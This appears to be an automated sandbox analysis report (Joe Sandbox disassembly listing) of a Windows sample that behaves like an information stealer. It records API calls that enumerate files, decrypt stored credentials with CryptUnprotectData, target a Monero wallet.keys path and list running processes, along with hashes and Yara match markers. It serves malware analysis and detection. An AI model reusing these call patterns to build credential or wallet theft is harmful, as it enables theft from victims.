                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00750D73), ref: 0073E4A2
                      • StrCmpCA.SHLWAPI(?,007514F8), ref: 0073E4F2
                      • StrCmpCA.SHLWAPI(?,007514FC), ref: 0073E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: d756d781b8b68d404593aaacf6403699739422fc1b446951d3099adb797bb322
                      • Instruction ID: cf786f6fef99a9f092e015b018479db214e7fd5ad132aab0fd9619c08fc6108d
                      • Opcode Fuzzy Hash: d756d781b8b68d404593aaacf6403699739422fc1b446951d3099adb797bb322
                      • Instruction Fuzzy Hash: 7C125172950118FAEB15FB60DC9AEED737CAF54300F4145A8B50A96092EF386F49CF92
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                      • LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: Ns
                      • API String ID: 4291131564-1137170065
                      • Opcode ID: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                      • Instruction ID: c4787a4aeeb88f3c8a88eaea842c65b36b23bca8c6babb5377c03c624cdceeb9
                      • Opcode Fuzzy Hash: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                      • Instruction Fuzzy Hash: 8911A4B4240208EFEB10CF64DC95FAAB7B5FB89700F208058FA199B390C7B5A941DB51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 1Yj~$d9~$qG{$s601$}^K
                      • API String ID: 0-2696981074
                      • Opcode ID: 1e0e2b5c732634ffe622e732164bece3832fa5197c5a4981ffa92f3645108b44
                      • Instruction ID: 583872e26b06641b3bf446884c20d4f6037d4aef6641a4f16f8d5893894f0fb9
                      • Opcode Fuzzy Hash: 1e0e2b5c732634ffe622e732164bece3832fa5197c5a4981ffa92f3645108b44
                      • Instruction Fuzzy Hash: 26B206F3A0C2049FE304AE6DEC8567AF7E9EF94720F16853DEAC4C3744EA3558058696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?W_m$M}?v$Tb/$s6lY$j{
                      • API String ID: 0-3946083186
                      • Opcode ID: 00d8c89d2c52ff91ed435527904db3fd92c88451314f49174a87a7b6d910f12f
                      • Instruction ID: 07e38b63dbcbebd02307e49e148783c43c6a8025da0f843fe57cbdad777ce88f
                      • Opcode Fuzzy Hash: 00d8c89d2c52ff91ed435527904db3fd92c88451314f49174a87a7b6d910f12f
                      • Instruction Fuzzy Hash: A4B2F4F360C604AFE304AE29EC8577ABBE5EF94320F1A493DE6C5C7744EA3558018697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 1w>\$CEs$R@ov$q{$x_7
                      • API String ID: 0-745289873
                      • Opcode ID: 2278cb46203f2265a10ed2eb71a87ff6b6be7f4e84d011ecd5b7065a052cf130
                      • Instruction ID: d95d4d41abd886cb784def6fa5e07465a6930de777484a9c367f54532c3aab90
                      • Opcode Fuzzy Hash: 2278cb46203f2265a10ed2eb71a87ff6b6be7f4e84d011ecd5b7065a052cf130
                      • Instruction Fuzzy Hash: 1DB2D7F3A0C204AFE3046E29EC8567AFBE5EF94720F16893DE6C487744EA3558418797
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0073C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                      • lstrcat.KERNEL32(?,00750B46), ref: 0073C943
                      • lstrcat.KERNEL32(?,00750B47), ref: 0073C957
                      • lstrcat.KERNEL32(?,00750B4E), ref: 0073C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 41c3895d7b96e5119f825f15911ac360356f3ba4e6e3a40ad1033d3528fea77a
                      • Instruction ID: 5a930e368241d0a5210c9342e52a1b29f7a8dd7b39c45c48f1bc5011d8a2a9d1
                      • Opcode Fuzzy Hash: 41c3895d7b96e5119f825f15911ac360356f3ba4e6e3a40ad1033d3528fea77a
                      • Instruction Fuzzy Hash: FB4172B5D1421ADFDB10DF90DD89BFEB7B8BB84704F1041A8E509A7280D7745A84DF91
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0074696C
                      • sscanf.NTDLL ref: 00746999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007469B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007469C0
                      • ExitProcess.KERNEL32 ref: 007469DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: dfe886965b9171f28e7c5037f0b36543b6f23f5b5fa18be72d31a20d9d72b6e1
                      • Instruction ID: a590447a1137de83b38ee085b756cbfcc6d1df2f235f3cada85a5abf35b3bc44
                      • Opcode Fuzzy Hash: dfe886965b9171f28e7c5037f0b36543b6f23f5b5fa18be72d31a20d9d72b6e1
                      • Instruction Fuzzy Hash: 00210176D14208ABCF04EFE4D9499EEB7B9FF48300F04852EE41AE3250EB345605CB66
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0073724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00737254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00737281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007372A4
                      • LocalFree.KERNEL32(?), ref: 007372AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                      • Instruction ID: 844faf56e5034fc5ca511bae41131f37904dbe9cdeba50e3db689475ce56314a
                      • Opcode Fuzzy Hash: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                      • Instruction Fuzzy Hash: F30112B6B54208BBEB14DFD4CD46F9E7778FB44701F104154FB09AB2C0D6B4AA409BA6
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074961E
                      • Process32First.KERNEL32(00750ACA,00000128), ref: 00749632
                      • Process32Next.KERNEL32(00750ACA,00000128), ref: 00749647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0074965C
                      • CloseHandle.KERNEL32(00750ACA), ref: 0074967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                      • Instruction ID: 1a4e9ef66a0bcef83310bf0bdff26d2a378712e78a38afbc0d164158f4b1a5ea
                      • Opcode Fuzzy Hash: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                      • Instruction Fuzzy Hash: 99011E75A14208EBCB14DFA5CD48BEEB7F8EB48301F104188AA0997250D7349B80DF52
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2<y$OW[$ny$v$a~7
                      • API String ID: 0-1631520724
                      • Opcode ID: a2aeb4bed08d1c7ef46aa3824aff839122a0f05cca9a5d955876cf7acd9e52c6
                      • Instruction ID: d3858a650dc354d35695c79da7c49f6223ef190c76cf681798e143d2d2ce8b80
                      • Opcode Fuzzy Hash: a2aeb4bed08d1c7ef46aa3824aff839122a0f05cca9a5d955876cf7acd9e52c6
                      • Instruction Fuzzy Hash: C5B218F360C2009FE304AE29EC8567ABBE5EFD4720F1A8A3DE6C4C7744E67558018697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: QW3IZRF3BDFQF81$ZWw$odo$s[_v
                      • API String ID: 0-445414117
                      • Opcode ID: 74a485938692efa6c1ce89b1571141924dcfd95f982bd717386685e97cd843ec
                      • Instruction ID: 957e3ded87c646f901046f0584590d010dda5f4103b55ae06af1db9b52794c07
                      • Opcode Fuzzy Hash: 74a485938692efa6c1ce89b1571141924dcfd95f982bd717386685e97cd843ec
                      • Instruction Fuzzy Hash: 0FB215F36082049FE304AE2DEC8577ABBE9EFD4720F1A893DE6C4C3744E67558058696
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00735184,40000001,00000000,00000000,?,00735184), ref: 00748EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                      • Instruction ID: 1b6171c79ca659d935af32f6afdddbf28650493005a91f96fd8cce8071886f46
                      • Opcode Fuzzy Hash: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                      • Instruction Fuzzy Hash: 64110675204208BFDB40CF64D884FAA33A9BF89700F109448F9198B250DB79E885EB62
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013EDF28,00000000,?,00750E10,00000000,?,00000000,00000000), ref: 00747A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013EDF28,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A7D
                      • wsprintfA.USER32 ref: 00747AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                      • Instruction ID: 53553de3a79b1f70463da2062d917d9885e859450eb2732c1f0e2142222a8369
                      • Opcode Fuzzy Hash: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                      • Instruction Fuzzy Hash: 921182B1A49218DBDB208B54DC49F99B778F744711F104399E90A932C0C7781E40CF51
                      APIs
                      • CoCreateInstance.COMBASE(0074E118,00000000,00000001,0074E108,00000000), ref: 00743758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007437B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                      • Instruction ID: 77413b6f36953888d3a55742da3d0c5e1c4de17b60d52d0d4230c41e4731ac0c
                      • Opcode Fuzzy Hash: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                      • Instruction Fuzzy Hash: D441F771A40A289FDB24DB58CC98B9BB7B4BB48702F5041D8E618E72D0E771AEC5CF50
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                      • LocalFree.KERNEL32(?), ref: 00739BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 67e323a2c7c0428f1ab15689cf4fa4a21b07d95d749687cd72e1f81dad7009a8
                      • Instruction ID: 829fcac961644b0163bd4445bbe4360644128c97bfb3eda121b07475fa73d1d1
                      • Opcode Fuzzy Hash: 67e323a2c7c0428f1ab15689cf4fa4a21b07d95d749687cd72e1f81dad7009a8
                      • Instruction Fuzzy Hash: EC11CCB9A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE50CF61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: nO8@$z)s}
                      • API String ID: 0-993586279
                      • Opcode ID: b7389914acd57014dc2d8cbd2c37db7635bcafec25235db241c08f48376c932d
                      • Instruction ID: 7ef99921d19cc504bcdf219cbec8bad901ae6296d1f60a3882b25d5ff52e6d24
                      • Opcode Fuzzy Hash: b7389914acd57014dc2d8cbd2c37db7635bcafec25235db241c08f48376c932d
                      • Instruction Fuzzy Hash: 37A207F360C204AFE3046E29EC85B7ABBE5EF94720F1A493DE6C4C7744EA3558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Oyg
                      • API String ID: 0-2041403369
                      • Opcode ID: 35d356bdad648482d51f4a84b111c9568337de9808d6f3ab4a7f07fdd6fa03c1
                      • Instruction ID: c5db6e8378abf4bf6c7981c7b89d8fb588a774f48d5b1199a59ed615cac800a5
                      • Opcode Fuzzy Hash: 35d356bdad648482d51f4a84b111c9568337de9808d6f3ab4a7f07fdd6fa03c1
                      • Instruction Fuzzy Hash: 4AF128F390C204AFE314AF28DC45A7ABBE5EF94720F1A893DE6C5C3740E63558158697
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
                      • StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
                      • StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0073FAC3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
